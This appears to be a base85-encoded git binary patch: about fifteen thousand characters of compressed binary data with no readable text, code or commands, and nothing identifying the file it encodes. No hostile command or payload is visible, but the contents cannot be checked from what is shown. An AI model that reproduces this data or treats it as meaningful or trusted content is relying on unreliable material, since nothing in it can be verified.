zs*$|>p_)Y$e!0eAKnD182WcsSvnV}ebUtMCO~dGG=}EKwgY&e`Nz=hsZs&f@$t$QI
zLfVgrA$0pQeuE~tJ7-|K)hXU0AMb*vo;=iD)bJY!>TCn=YLQ8Aq4*NFbGPOn?1Ff>
zQ}(M{vBz`=Hi%)b;Ag$CC(j+3*tl7Vvo%o3&Gta{+|Exl|3jH>=Sg+zGPt1D_bq;g
z>|5N}7@Gq~!zQ!MXrIPvdUj4MMf+6j*5!gum`1`*;ze8GHoLK_xEJ3nx`v1hn4^Mn
zA`@RnCCR82)J}CfPq|Ze>ebP0-pu$?cVv9yW@2+^=lJPv=V5;?oC$A(vwp`VZ3G&j
zjVNAkV|^2;g$V#j&H0(JfuMCf8W@iaiG%>OkCq6P6N!zX{=u=R4-JfWJNLO$wl;;1
z{=rd1N`SrUtZ6j7`q+M^v5!U5AmVS<({HE01GI<gJd6?6AW%99&v2&BcwbG=Km&oV
zXkb<BqmQA9Wh8Rhkr|WK!R#bjsXCGGMlONs!@j^vXUVJ1O5s(<%T7N?E_DW|egOJt
zxQNECJNsJudc$sgEy?376RywU=lmS`-FA`d^S?l$d&%|rH!`Zv)GhXspF(C;zf<*l
zt={4wcc-1~gZ~_deFOZSW7i{`YdhDI7oG%iupLW3v=!b3FVI>QGLr{%?9ax1?61~*
z*vso+JA?ytAGW8*qPy^;?V(M+-r~biC7!bk=oVYz`I=SJJ<oYM;`#!shI4dR$>_T3
zVQ`@Bfy-*P+4+_30)6jU&(tmOmAyfCfxb?^TIsc{@)p-MxInkV4|Xrz1$y0g$OSql
zq;sot1*iQb<Ri+lovf;n2O=6+cp*~RSZnoL7`#4HciBtGGlAx}X~I`Mc{<PJg%dBt
zs^kcLjSuBxW4}f_#Nn@A!w<X@z)^sP)EfQhUX!pTnGakt+mp_R4%wt9bn>qVPw2w)
zIe8iI7S}{UYtT5NMwE*|B|qrw7^~sAE^6E{`gwMYlncC}(?~*2s(XI>VA4oZ>);K&
zEqOz47}Gb1yIOH)=$wl=H&(zKI{N0qAGWGXCZrZ6P=~yMhg(r^z>u-<i*AqdSq_0i
zz8;tB(G{6zMEp#TWzD^H``BUfdfts6fM_LGL)Re2Rni51&*_%#5Pc^(MCZ44hv+R-
zc9d<0t0)?tmTn9Walhx1{jJ5z2ZY?*N;1=&&<qb#SGx8?YZr3u=MI{W;5k?zqF+qH
zjL5z*j%ijkCb_sp<hcm`nPaRA(PxfnzLO{VF`4r8iHUtR!W)wih|G&|%&>Z5lBdzL
zv*MPKnUOKcYK$W%CLuc}HV1iqNIpa4-6HCHEduvnjdVBmq0XPXX)&di$oc>Ap)M$<
zuLT>|rudlQ?$!7UwFZ?GCcbN!cvqPCT*OnovOYfUh@&+tihsW)P7wH*;y4C>q1rP!
zOgyb|aTo2EE?$WTXK9U|Wi@`X74jLFT=e24UXg=$w3XHZDbQ4z=I3%vO!kf9Y2Gd4
zr7TfAS<f>5CY)2Cc;i~x4@d?O%;kFw@y7D|8sd%R%e5qP`H#>;4g|sndJZ7lBOfSG
zdNS^1{A{s!VNTyp5Q5_EhV*;F#79wO2(o;+#*r`LsT`WJ%X%p-1xinU&luWaj2|rG
z#i2fZUlBpHGN$*4c;k3c`FD$W`S@4X+eO67_R9EMM7(i)>0XZLkAo^jkm+3_K1q+R
zkH1&MC!6B4M0~0#zPpG|GsQbae1<8$i->oa;>BhC_bX&Or979K(o1=6zCYM;|585c
ziv_(TeavfL;nr>oNr(~1kp%_fJ319?QvaMS+;iG;Q@vCM1#|tx4^*ZQdrHDXQ}cI2
zYATb)+ZdLM`bn1?1IeW^(AqD>xr~uGuObjYxKbbW=SBUOTl?*WI?ObodT%8#4iU_0
z!}+LB7Wo~fGUWKl=x1>fihdrEf4fX5j^_MNAwCrSGHFp2!J{8I{}4%Jeu+P!>ZU9X
z0dy6j!=wvB<tKPH^A6>&;!8V<LWZ_6nCTa8?YB_0|3zbFoSXBHXzZf?vTMIx)6$y#
zt@Ba?)4F(j8vCcMQy=n@f7(85z1p8<(mu9=Ce#1%QQxA9$mJ<s{vRLpoNpR_B11|I
z$&!KD8j>Sk7{G=&It}&hb3I;4dgBbCzTHkxW3>6Z3nA-(cxl%dOCg&eRJ<A{9=5l1
zQLo#|O>k1*$V|WF{WQHb|M69C92H<TE@|k@oZ><p1v#$z)umV(&K4;X055e3=>e)o
za+uU5;cOA<D_+(sk5q;+gtJAOnxAY5DpT6BvTT{Zvy2c&S-(7fUwzd_2}qISB=xv?
z{D=-_JB~>8kMdPd&&iEJ(p|=dvjrTY{bOW8aWv;2(b!e}Wo-dxkFL$O1zZMrcJX#J
zwgvv<tA2u`N0;<2X}3GOPZ&O7Y{3NQ%U#pDq-CV&(Q*ihjHE+oZJ<}~gT!}b6en#-
zId8VS^nhZS7;Cvcx>XeUfA%4boFj8T-dIn3E#h0gJM(YqtKO{BrO)$!piY;r>ba_J
zinIEr==4I2F9qTS>VsUrsi8;&il?cGjCbIi0^wF8>}vMAVBhWU%*gTMoyCtC`@-q&
z5+P7hCpK4iOP}$wUU@XvA5M2SHGeqWE%RTg?*3QzSufv#x>DUO-_w@wl95c&oZYPZ
z!_DKR&-yFX-J1meT~>ELGiHqOmF>%ZXQo?vv%fRrkje%9cj1qI<#%T4R!?YAO;P-(
zdAr1}RF{#Cle&!7sxKEv=KlHbLz`z0daM2s^Gw2R<2+OLxg+93%_r%7;ZX534+#~o
zjF3!(SDA-BGiuD3Cx;PFUFI7q4N1q2824g+K|@~oga`FeAQ_=x)=grm_TN@F$#K-F
z({$Z5S}5!*)lFth3RizP-PF|l;dGPCf2F$VN3y}Dqgl81#(jFs*2uoWbs_#JIQVbF
zkHmHvGaM&WraAvykwDU4T-NIbdHonpi0550LL6s{0<TmzZ4%{NscwoA^*>^2mzjRy
z=9LRY{wC=r7`R=U`VF*hcXs0+OLH{+dn%dVqMNXk99zdfFH%K4#d2ywdGj=sK7NFm
z&7E(Nev&$hk25|;kB`xN@v6nQ1{#C!ldh6Ho`il89nFE(jzY!X7bafURm4;VU4=_$
z*UV<Cs|Oy*>))5wK8%?~1IgZ}K)Q=;KRIs_kJtWfb(S1Yq74NzW`vth6$;Eq)3fns
zVw6{kgDf}PTIc|g&wMb~A5LdAHGeprCG%gY&MG!HTwI&mA5LeLi1ZFqIg)-ddN@v~
zOhIlLt;`o^ne{RHi8+5boh30pLF6a-pu94_j1N^eWvQeege%oq38F*8^kV9N&GZYW
zvnoXXCh06Zb!n>3>gr6(Xs*sWOGbeRE`Ds7Pvz+fi(cN%tD<{cYthcw=H6+pru)a}
zI@*g#`&9AfAl@6))g9@<EQ&`6cYlz6JLG+F>yiVF{r5>%a@wFz|0rEavO@DlS*|?3
zfcQ{4_cf7TzPlvT|0+y+T^EzE7<4f%jp{V?r?fAfI_kREl({|`#n-F%o{iEP;^ov8
zsT+)e#;F_P(I@c=-X%JoFoXh$X*B+%?(ayE2xgl=>I6z}e24IEp8C@CZV^xEX&hwv
z4iQgKWyEinDPE4tP*c1dx8}ba_T65?%@zHW2Q%h}vpM8<D@#R2(pi+(th2(|9Iwg>
zO-FP6;cSkk<_~9c$o!JOWHV&_@^}|+$a9&7j(;*<7|zXU!`U2VB9Ft6mrf=9Wb|;H
zP?<)arF)h1gD_D))c>0EhqF0cBp?VL{ZRiNmCS!Rn`40J=xlK$JDz0MoS)(h(@0U9
zqR4%?f2ohrPt5cSXLFQ@_BYMuC>YmNo5T4Jo+k^-qOKq*p^AEVB@<<dWq;2+`C6)6
zw;eQTJ5W@pKx6QI(*3;e=u;B@Lg{9b@lf&ig^3rs8BAr=%?0EB4&B^1GwP)fPKV02
z5?>f~sDm;gn04IuO=rpR)O&j=K8Mp;g#tv=M8@XotVd*prlT3N!s)E0<`1W{Wd1AF
zSyN2ymY3%ChtpXlB7;L_6i12qGCG{jnlBP$%7kI^htpaAR`cWu1!J15v+m4j_B>h6
z*=Yz|d>k6)$<_S285{AC{z`R}@p&WJ3YQE2>bmJRbkO*`QTCZ|T;jTs2A#sh>pF;-
zWJDMTiuvQ7e12HLs3G+ez44<8hCDs$MZI*gB`DCik?nT5dD8byhe)~;4Jeo~Fq{ra
z7CJ=Q$IaCtUcI_Ye$DlV(;-dGA5MqJ{8y?&3NC569${{OI2|JAD-KgRP1PZ@MLwy+
zWijUb;dF>A#Q0HOnO}}8^+zO?Rq$hlxN?XNlk5;Lne$UzsCiG7$S2n?L~)n!U$}YC
z0MV#1GNU+}=|4g&*fd#(IJ@=G9}qVE`CuA>nFua^Z16RxKCC{ZKB)G8upb;p#NaQ-
zq6YWE6GUaK+Zm+mNO6on9NY>8HP)J<t@vw!s05@`op9@u(@H<IL^7OdEZd57gQIZA
zrUv)x>EQMyr;X~QLu;N6&O-)9A>BjpUzF2U4ery^!D~^DU3JnShNoMmu?M1y>I%_(
z`;?XVMV_&6sFM??1`q0aR^Y0=>ZC(Eo@a%|o}v$oKM%J@IajH{LwdTExVlDl(&1{J
zZl%V?B^A|`q0|X+ZgvE2QPeZr&cNlx@Z_3aDBy88d&#+04Ia=7SdOdfRVN*;;{`0I
zl;|tI;+}JZ-c{bk8~JYsq;aC3U$Gr*Al#9x*PJWKg^F`?O*CAfxY=%vt#q^XZgyNa
zuTj}oNTwE@`SIhwn5!0j<u6@#x5h50aC-u00RGhZ=?i9)M$qv2ZvDgH@YzvEkx)-)
zeRleSCB*57y$IJp{yDSh3g0eY0v`;u)IIn@Kw-H5m6w0Wyf!<1&JrpT$Awgivqp99
zR@okSQCN!))PJElPoX^ns$N>`T#IaHH1;)>Rdj06`1gG9m%-qBgg3??U80v<mz_Ri
zAr+~zW9c(^(^w5E#`oH1@YaE_7vOvdsdM}vE~FNcAEKP}j3rw7hkF0gKb%jEfiI6*
z)wv<KI!Y&<bA#LYrN&Oc;g0i!n;ip*?&yAeCEPWfE;{ko$$hIqOmrP2M<VJgYPBz>
zxUc*f3$xQd<Xxru(?2Ys3J}E`z^Xxdq*Q|&P}M2491Wy4^OlKLiWZje5fClZoL{NV
z)6P>GJH$RK`s!Ex>iQRbnfUD16R6}Xm7QTH&<czdHG@1H<@mFf<fJd<^wH9n@<!k&
z8i5pFy4gkEiu8h{(;6!P0nkshM7V2`B-7F}79uq$Cd$$&rm=%==f&VbI}r*+V9<|&
z7QyPc;32zhgU0q!ksy$aA?GJ?w)GmThVzQk3{H#UklR)bnw}M6H#Gu4iH9<^@C#DQ
z#$~XLVEY8kKQifb@C!T3PQ$&^$ixOFLR1iu$!bwsuquv$F5}{DD<}c$oyDGVAritF
zYb%G}8QkB)25Q0mcGb3=$`2mH&Easc5@%b*s)9%3f|YiaU1Tr$P>&7LS_wkL*)C8{
z4DSKlJZjq>+-rB+4zY1VSvkudi7dgIxZv?P+gkLSea0Ywl}JK)p31jvw|x!Vu%j5Z
zHjp(HlCQAd6N5D!G~2P@-UyamVEde%V&f(S4@Dq0SOteC7uZL0k<PY**!W-^qS^F$
zh)~(OV71-0Cy@9%Tq&BZ8f}WRZD-TVaLK-8lNZpjJXmE9?vG<Zc9t!gj~Kc>X18tE
zY==-BTeKW;KmuSY(S7ndep!JgB7#k?z$Nv4JN00kL$v{6x4YR^qD^q0U1I>|>?F7t
z0w7}Ssv}fex!blGLr~cvcq~F=8{KS8@OXqRh~yoR7r>hgT<(DSaM?Rm1ubpof>ja7
zrLoUdwgxE%Xlw(Bj{Ac&TN&B{CrfdxcV5xnx;l$u1B>p(&CgkOf0dm=#-cA2<zgKh
zHyRD0Tw_oq16XW8!noiUap<s{s(xz<b>|{mrP)@)>yRC{*rF1|p+#|;ZIw!_6UQbO
z@~A5Ge+JHwkezee%5fLXLV+M(g`4e!11k1WDJ7uHD^*s;7Lfshp2neD7#%iw4!_=u
z4phe3b|5DTLpx?suH$yiR-xHGVbd4l64kTGOK`&9pJj_a#3}n|DSoSOgE_9HL#g;*
zf@_>HN$1s~FTc6<U~KxpRE-@4K3{+UsSr`XwA*<GfOAyyk4xr=%`t}{2iP1<kh5Su
z$7tsvH#^Uct3{`8xPA1V;KnHAf(qK}Jg2cQ)Zh^S<az)HVh{M2a^TEP&zet|0c_1q
zUpkk=^##>=%vs}Rr-6mbN*-DWr&*9gjeUtm0SF-`$9SU%j*7m#5Ipn&32&o@q3NP+
z8iNP0^=Ki-BSOLBun0CpiTZ&oXw3yQV~J=6b(uPg=5WB)01@Y%AO<>cpo8i>iq?Vm
zG*;y%ZWtF2Wel|l-b17fF;B&+p!#;`xZu$U@F0HKOZ|yEZBVXfgI`c;%~pd(53oV6
z0|5?nU;_sssm5N)qr6DW-kXb2LLB>u3ntI2vN~dFc1UCIkl3lgFWN&mA;X8-1I1Lf
zLKjfTbo=1(w!!`FgH>&VN84()TH85{Gn;IM(dN%i(riaD9BtWK(R4k~0l9G7&XYL4
z7ez5oB?H1x3E7C6e|V~`+@GBckRgOZD%&c5HiYZ~dnpMy5rMA80TZ(wY@mZ7Gh%GZ
z(T_?LGCWnatpN4`qBv5zY^(H6(=~fZv#o%jgPf{uH#-N?u%|r1nh1~yS$#lN<OFC%
zu(wDmWL_Tg5pld0$l?q7!Q&l>npH%`Kn8~|_8v)2@F=KVsRfdLjthn3;ssrXv_L9{
zOM*n(dDXU(5L>l<#@^dR1+(|I^TRv4`C-vE9E57{PlD=zI)P$99zLek5v1B#b{2^{
zH4j809r02=HU1-lKwiOV6)-xkfI7OUj3O(jAeAj=*%O0%JD}@qGQlU|vTX;!FFVJ2
zPa?cnPngTm6EL9Jsv!BAZ7-W#iR2n9v+ZHi58yOd*%l}Q^l2NcZqF7S;e}PTr}6--
zn}8&3gSb3yXT664Sv6JxL~Cn1j!2E|0aA{1+bUGsGUzkXUfE+XjBW-XePFZ=dUg+x
z+6{-AhrkUr64z|7!}i+QM^#jRH6as59%XTGB%oDo6>ysgsM;Inwyhy(bQ8?KPC$vi
z*-mKe6Wk_j)!1Z0NYw^a`w40S1_D4)2zazY$2HY<GGGlL5&HcWfm%)=nh!5ZB)H2C
zWc`Hh2CE^LhdX2kGWbBFWWqkQ8__iAP%CRx+gYmp^;+Cn0vtk-lTYKork~{(Z=J`%
z;Ae_n-cTQg!?)lUaNg({QP(i%@B|V+@)R$F&GWp)zIdV)y-9%8<f2(YUfbZI*x(ll
z9@v^^L7xQGdBVOpKN7=%Ne7)q1P@`hL1!(r^xo)mtP_6i@>}uWmbl4JZ0Rp8$1T-a
zi+h-V(4jTYNoUbodUge72O69cqE0(1kHI;a?JI>vo<43JM0%6|scmlOI_Cv~XgAxZ
zvHb+lpcd>pvZfE@_!CQ2b~q<}&V1cGgy{{iC$u@7fY`YN`KaU|0FxWO3rZUd-_*I9
zH0((^AfM)cV7J@(nMyXevkGUL^O)v;YP;$@>2|IFv>$adU?NH<GnJfxQY((;_>*R9
z>GOCKz<4+nGlQ*^D2MJ)GuT1B34C^-`3F`8*GD;zqtwG_EqA4;rKir9ZOTbUThS(X
ze|0<es?PKNmkzj{Ymppk2P$|M%8u2XKzvD!T{->?P~#gIr-B+V>xmkeC=fMprBmZ`
zeG-%7pCzeLmjkbfTKX(84VcAMCV7p77IHf`(V6q4e;fwkW6-DyWN|x}Y3x(<9!)_v
z569{{bBjN93Fb!7WxObMszLqox-b@d*l}oGbcmfHC3&2T{jW4X>O||1S2RVRGo;Vr
z(<9A^dI#3}UplQit2Owg^bbD^VmOa;0p5jX5UFY2fzw?YW*wL_p~t1f73>^0*NGAr
zQU9mty*|Z2Re~mdeJa2+WtH-o0W#vq2?4tu)&(cUSq;kAxt#a{lQgy;)g2+86c&TZ
zPNt7LulW;+2$Cydj?-)p^-GQfAD|)7ke`DR&I=&K@q`9rV{ZCVPCQTt{j?H!XsUwz
z{&AQl!BnjAKLwYRU#re@{<}Oq`X`+&xLNDCQL}wag1vc_>cj|ru60}qjj<VX-@TBo
z>IGQJgzHOqvQ(XCA;OQU_KL^gClIbD;V%$pYt_LTvuNyot2#tu-YAVd63tyu>hlqo
z{U@u?l)B<ok<~vxS64?6L+C>ODPsv?9`XdNAJyZ`)%L|NThK{bwAe=glS=?IxNYzY
zNDh`TXwk#@4H5xd_5&&C6bco5L1$Jiop4BVuA(AZiDOIT1Oa%QEuEmNe$}LnST$))
zNyIsD#uJ5Wn1<V_ZUD{mF*w(O$P>ulq@}x}1>$J_vB{eMajX}74A!g{b%>@E^-nO?
zN3+S}D%&scCVdVUQH|{*LC0KPH!%fI*cX42?S~wIt&#OWHiVmG8jJ<;;ASK$O>lk&
zv;kL>d*vjIoPVrC!}0}|EdW~>YIeAx1)x8`CUG|BBVthd;{D()-Uu)@PI&_`orEmF
zBxZXc4SwD5MfGz@oJAAl>V@+RIKn?T(e2y`o<Z-O=Qze4CK8xBPdKNtT@vbmL^zd|
zqe_W%L=5t~Dm%~6NDgeg^Bmy7%sR>*^bdwd)*837+D(f#pOK?hx?GFC)qrgK`TS)k
zNjKCXilt#d(bmG8^eJ<7(4WHFfNM@`v=FqQHXx6it<3QQjxh#sb~~R>@%{QBXqYen
zNl=A<a5T`Cj|gBN3<hw+1la#FnC+D2{1j;*bZ6N&Kn~Fek_3<gjX>f0NR&%r;K;EI
z(tRBBb$x9J={bc`3kjeI6_Lx$DjTR#0lvj50@O}5X9KGnlW2cS__%dDD>SwW{jStt
zX~1c$jy7c+W-fy5I33twfij>GIQcZ<3kBe>;6S4~F9LdvNK=@;ln)6wO!Mc|5_^dm
zg@5dMAP82joZkRsUOwyXai$<i>-eeLw%b#D3>X7c0lRdpuw76$m%-I7<f?iJhnW2|
zd_j_9D67=~5kL#TX3b+7vjJ>yc*Lp>CXBg1Dh$5N1-`(bF^By8d}Z?F$x3Q!s&eGW
z5#@sqK2UDG^;V^<tV}t0@St+wzyW3I)TzqD4?nEjdFP$V;lqcO=;&zW_rL$WqN=KL
z(@i%i$B!RZo__ji<&8JqP~2{}a_zO(D!=;Guau4*J1R$y9#vvuVwApp`zpD)xylVU
z+@OpaHA;E?_1BfZ{N*pov}x0nB}<klfB3^6l-FK+O_?-ll2TJsquhAojmm}%8<czR
zy;p(HB4zjP-O7+5LzKaT2P-R9tWestX`@_s-F3=;|M!0@d-v{Ddi3a_tXZ>0`S|0H
zm0rDiDUUt&m~ziO_b5Ad>`*Kgi!yNFK;@H9K2h$!|9<76haOVKj2WZ!>C;E?`~6DW
zwr!QS-g--U{PD+?bLY+}>(;GP7A{<<+<yD*N<l$^(ym=QrE}-b3SJOaYHMqi_uqeC
znKEUH^5&awDxZJ;x#IKrl(lQuD$ABFQ!+9#l$T$AS$Y2X=am*MS}4yv^NjL8|MNe}
zZ+`O|#p!e^n>TM(uDRwK#cH)GpMLtO5+5J03>Yv#x$CaGlwre$DSP(pQLexKdL=F{
zPDxBmRJwNUs@UyzWzL*A%GFn2t@P{HPf18fP)?pasdVbpNx69OqM~V<vT@@^WznKV
zN_ly?^2a~^QF-a5mz0?^XDUfaNlH{ylu}hyrOcl{Ul}@dsB-@NdF9C`pH%Yl@|5@9
zdr#T4X_GQ{?p)<ZKl+jK_S<hOj4@^S@ZrjT{nvjf{rmS<9)0vtr9+1f%1?gs6Q#1U
zQi0c5W#q__%9br#l-Sr<W%=^uoUJ?_kMi!j?<!}`oKYrBn4s+1wM&^keYz4E8L1pP
zbV%8`bEjgn*_0pr;0MZQpM9pxnl(##<&{^IL4yV<#l^)+L_~zLe*Jo-ckkXxX=$mF
zo}R9ZA3t7s;)y4eufF<9Id$rk^7EhnT>0^jf2{oNZ+}zv?c1k3@W2Dg&wlnZW&8H+
z$}P9tqEu8=DBZhvS5~fEsoZ_{-AYkWk@C}@{#1GP*=Lpe?z>NE-@d)_*T4Q%88Kpn
z(xpomrMkLWdGW;;m0$n**UF3;Gn8Nc@|Vikv165`OP4CIzWS<?l9Hl)`Q?|&*I$3F
zEMB}=x#NyIlnWOwC?9_Kq4LNhk0=u-PE=;ko~^WO*;0Axsi%}LzW74P$;nZkd+s^q
zqmMpPwr$&{+<f!R%5Q)BTO~U?TPZ0iQQmpy9VHM5DBpbZjWTZBIHgsqR?46L^e5%P
z2Om_<o;|A^J9bQ2uwa4Gx^-)%TeohC*XvboyX`h*^ytw_R#ujhnVG4aIB`OmH*cQe
za=Db`<YZ;*)~(79fA~Y?&wu{2vU>GurDxBcN-!8yuDa?fW&i&D%I|*nJLUB0)5;4k
zyr8UFwMr>0EL48+i(lj``T403{tqDdWf1xU5cr27?1v%fzlV_D1Oa~<!tI7&{|Z8V
z6aw8B!h8b+`E>~KGzjn?AiR?xxHm#*?}fnbhOiEXptgaK{x<})2ZZxu2<BrD${i5M
zfe^;~A&6rjgnkI%TM)i;5WIyDx&jDXX9!y@1Z@h0>~jd%S_oGL1nYSS)iV&N-$0l)
zLy)WxqId|<T@ao<5S%y&O;-ra90*H42+Bza$wdgrMhHha1mh(LMG^#}3c@fHg774S
z;5`VyTrmIJVEo}=`u<?}4q*05F#1R^c`O*5c>7&2_5?8XbTITGFtZJe{27?|6)<oy
zn0GxGw-ih}9t`^xnDysi)W3mA9{_`H2Xj_{F;{{qi@=c2f*IR`5l4UttHFT32J`(A
zjJFg_mjZ_S8q9VF80|wa*+ei{OEA|LV65lBRNKH%zXdaufRO@VqH$oLKY@A9f^imr
zX}W=7ZUeJqfl*F?NnBu%tzeEngE4x7DXs!T{0_|U0vMqXOfVVXe+0mPD?tAs0DmgL
z{!RdWG(cVjz#j*=zX4#s7NFh{fF1)d&jpZ=0*L<w0KNp^{ThI~2B5tGfSm@g9s;0V
z0g%290KFIByavGB3!r=t0NDaC{sch$5J0#O0Jtr{_i+I4I)Lu&0Ni!}TL*yleSqwn
z09YTubs2#5Wq@i60P6n$Oq~GIYXG930zd}<Jcj`|uLo!*0x<0W%c}vD2>{7X07wns
zxCp@bM}Xo?0Aduta6W+WJU}oH0JsU@_aguw1L*x10Pj(N-A@2?bpW|70J!A<H;>}+
zoB^oq0-(WfS>#Rt*$)6>vjAX&0A3LQuHFExbO6>90IO2~sviTS_5q-N25`Csz|<X}
zbT<I$rvRh-07QQU2z3Dfy$JA`0pJ-6(0LVr^CiG$F@WX*K;{tu%xr+mQvjA6fXYVz
zl$!x2*#MGv03zQ2Kw1Gj9t3b418B4cV0Zx*qX86|0Eu}3h-84n4*?9T0SZ9?!hV3k
zX#l}0fWR*R00ifxrbq>mswAi-HBGQdDvh9oR4u7{f;UpHq<%=flG#8|M=Fq1E13-h
z_oT82Y6<R01&|s8)NmC>YL3)2K_bBwsa}FgQthPj3I0eelG-PzCv#vZR2IP_!8XA%
zscce(q-sfplgc9)CG|uwOR!DQODd4e8B!|**93tCy#%eKE=c8*Dkd|6OdC@Bq`FA0
zlPV^Yfz&3cP%;@@fLby&NOh1JBlSdTh~S@8C7DSC(WG9<lp^>hl}D<F)HbP9Qjer|
zNF|fWL(om82ALUTK9EU7kWZ?eV4l=0sa`T~$V4M^hs+@|%}DK&Dk7CaYKzP&Qm15!
z5!91uMk<+9G?^V_`jA;is*F@OseDp7r1Hs>BXvY-gH$A`bW(L>GLYIMwL>NlsT5NG
zq-M#)Ba?{C1q!6H$@C&~kjz9fdr19|Y9zHzW(k>6WFC>4BGpQ!4VizW0?8yIRZeCB
znT}+Rk=a0IAeoV*T1lmo$wMXpnSrDNN!^o4MrIh9Jfyx!y^;w=rU#jEWLA+GKqdm2
zIb<G?*+FWPOer!?$!sOlgiK8`3CL6>^McG#GCjzYBlD9?L^7Yq+#++3%sMiON!61X
zMrH(=CS(GU*+=FKna^Z0l37P4GMRW}R*-p3<}sN$WQvhmC)0>b3o;GKOeIs9%rG+3
z$lM^4om4uR1*FEwj3e`fOe9k8WQLPjO(qqY4W#bLgd<ajObarz$s{K87%Y~Fp;sYJ
zSA$&70|Is+`x_9sp&-jih}Af-<uZuXZy_#kp-U4moGsCvhrvE`LGGClnKKyLKLRRN
zL%iNW_h*2;wtyW<(WI|1w5`y*UjrU)g=oGCvMoZ>y%>@`V7HzahCvYdPtnX(5c_*U
zmM_u7*8oLN01|El+$3N~$3k5G0G7N1q}>Nmn+oV?3$f~lA*h9QJO}JQ3T$^6BK9ue
z>i2-0UqB3xfJB90f!iS#PlKK3gN-{w#JWM0{u?Z`0;HM-80iCXPKP*M0NXtdI2-_W
z`6=M)E{M7f(DD<AQ7p(m5zw(6(3TCjSO-==4wkwF;&>2{F$_?09a!iGVAHz+kCP!f
zivfYVz#7{C6SDy)Re&!)ASnWDRRf4<4Y5uItK9$?SO}<i7OWe9NSA;uV!)EuLZn{-
zB<BK#+kl;Z16GR$d%g%(ih~&Z7*Np(qVWY-<`KZtUO>)H4DCG-(F%xLJBXDP@KOL4
z>JR8hgZRA+IQ$UMlML~H5Rf$*ER+X${VP~(6GVSGSlS8rUkmoR4Y2t;h^Za0y#}n8
z5Am-9#CL@VJP8<!0;~-u`3FoU0cJKsJk9}rKZ3{}1*^NEN{YbV;~_rJKm?`$s(uMJ
zJO;7o4d^Zh9CiV$1i_LPi2EU^hMNIf9>DOMfc-xK!asnj_#t5HYe2yUK<?k5az2OJ
zcn%Pf0%%zeF&P8cY7e*^2?+TaAbJGU$Ik(GWl%-;0gC<yaP=!d6@#i70=Re|(0>hJ
z@-$S+Qoz7gsInZ0??%8$cZm65Kv^$9(Ja8?H-Pl>5TQo_^Zy0-xd_!T5Nc!rU@;4@
z;{(h@LWSH3m^cO4y$O)E1S;||sLZDzzOO@Vehf(K2*}m|!}kMzRsx281X%9@F)aq<
z?1uQi2X!|IBK!i>%|lSjEdUeO1LEcZMz4ap%YZ8A0Ck!OHF*}$^Z?-30how~XjemZ
z`~}eQ86f2VApLEq_DZPZ>420IP|u%09liwE{WG9rKUA3ukk_}lyGyMYXEKOe;IBD;
z>s&~mh(8KXW1;FY--D0r7afy^Z)4zF@%UyuzHLF@#c(0pQ2bHwQbTgc_Z=KEh;Lh%
zz9}Es)*6$h#Ux|@D*WSNKML()rMAzb0ubc>I~UIB;Sq%#D%VTp;(HsfM#9y@CEu!#
zY*$|{+J-hz+v1Upo)=M&<?2_Ve=UgqXYP9;5?lBviTe30Mn4bb1DEbJ-^UTXd3b3E
z<*S!yVtf~w^8n)L-B5~`*L++N=MnKAigrty4i@nnL_8la#Qjjj$6tjL1eso`e>u^x
zf2Ln{-vJF?j@)=r`H4|u4H3E@r0g-zj(B>=1J6zvJ92#Jn+>trDDFBbbQa@Hy>*K6
z6Jh{_2>i9gpL{3!R^d0?9RDW0q={gTckoy}p6<yoQk+m6{Ym=HH^oc((&JGIGQFfP
zhNe-xq;K=z(f-%?u6!54KYFj5{;u}fWIYG*Ed_d4mq-^y7YGUZLAeD-ijNf6@-Ws^
zuZ$PumzPQ^&Zx{Q%`e~8Hu4G;UMTA~-~`1x=*JLx;GEi&W{9KH!khI7l4oO(?U%=F
z+?40WbiWn(jd65tPD?(gTH(*!{)HmH1NV$U(qG0sg%c{%oPU$ZA8V@6oPQMZl8SKQ
z&lp@O`qe}cN#jrGDD%tl4^=m1sU*fgC=~S*ep4Cd{8XlS>=C65O{QN(nW-P@e@)%N
z_pd|eUn1IHP@hvjG3Vzl=AL<S{0Q-~_vQQ)c7>B+%n=cq{;qdyi-tzH_-Vtt-d={U
z)zuYb^((HxXY97(3ugsg@Fv}v;>y3>Q;4($ZI@ic{IuvIjq-%{9=6lRR#s6VteD2u
zS@vi-vhrsnD9is5MS9o?q^hP=^aM6kJl*T5_Hp}sUiBaSZF%A+5<BX4b8IT&DQQ#r
za8BO|D~@<6CQ2>m<z-SFg5*82QFuB-9NiBWXzc%)HVW1I|6z-eiZ$9Ik|rdACitT!
za-S!m;``tpl_T>@I+KkOD!sH(q;8h!XM{=r8^jyGS6`2<4MI3V3A^>`G9EiFv3lx1
zXfNGwxWCN|8mSvRm$86^zzlhQ)VT3aK06lup>UUe;5ZtMb7}hwHN?jl;wKv7iLNre
zL&Ou78}U5L6fego&lE4m;rnXKOcMQ-2a;!FxE>dwbeZ&*?-7Yf4^dvTE(&MMNLx~5
zuRoaUPZedF^;uK%hqGnMM2+?GBCZ|cC=cOmnHrJ6oL{zI9<z~7p35@ncy*}A5NX5N
zG6^ETg9<YQNq-p?&X&m(`G?Ac;%Lqv&X&m|ra&-`KiM5Jzr-!7#wd4`hl2Feu~4*w
zWV|*0%=xKI^VlOwk>BR~h%O946jvV;&X$=i+TSEw1|KeL^1ik1na$q&Ed5tgqg}k^
z4SS#QE#ZP_pP$e8xba~;Z|1@bb(yfSxi$pZ1c|&|iqcUWzwJO{@XxmiT83;w^VcT~
zhNLKwc+sf)WuNI7N@q9M2Xi>x|7@7@g?|q)p<#XE@*mUeDV21+))vmRhL13M2B}Y0
zudW*<ld)(U(S^co_#?cRI#$X$#S^2-c#=H|#CMce#@|4Z2o!JB;SP#KAiQXV8Q-(-
z6i9yJoy8Byi!p@Lxtj!0hKj_5mz39xnc;NqFp<xEFxQ_d$~5C{Q}aumn`Wv==D(cI
zB-_v2CMs%%sXTdUPTLzdLe2k6MFxk=D2|eTGI}^psLVz@i0g$Sfw^Di{Es0W@wQ8(
zmxnY#P$@4oew0_{m+_(MrZOt&2SI-Cl4LNH&JC+GMTe&HQW}2D^b4mmrOqAGkd>dA
z^N$}jYNXVcG^@Yd{NI_;U3_Gy>GOYuKB_5#iys^2|MW&QM|JU1wEqsx|3sALf7ptT
zhHL)5(Qa%gvajnIn00fnX%)lpilm!;LN8-uZv^|)z8KpF6R^Ek4ZQWI7rXyL#f!|e
zlNSg^+l&v#YAI{&i?>h|1{rVQN2Sl;uh`>Vc)YUDV%QFUd?~gHr_bWsUG0lE;ssQ^
zd`j2IK`;Ab#MwhujUC2zXcU0geeqKECwR%UXJAf7AbMuGma;|-?u}xf2d0ldH8u-H
